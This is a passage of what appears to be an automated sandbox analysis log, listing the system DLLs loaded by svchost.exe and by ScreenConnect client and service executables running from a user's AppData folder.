                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: diagnosticdatasettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coreprivacysettingsstore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npsm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npsmdesktopprovider.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: capauthz.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: audioses.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mmdevapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devicesflowbroker.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cfgmgr32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cfgmgr32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dxcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wfdsconmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wfdsconmgrsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: deviceassociation.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cfgmgr32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cfgmgr32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cfgmgr32.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dxcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_1_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: virtdisk.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: virtdisk.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_1_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
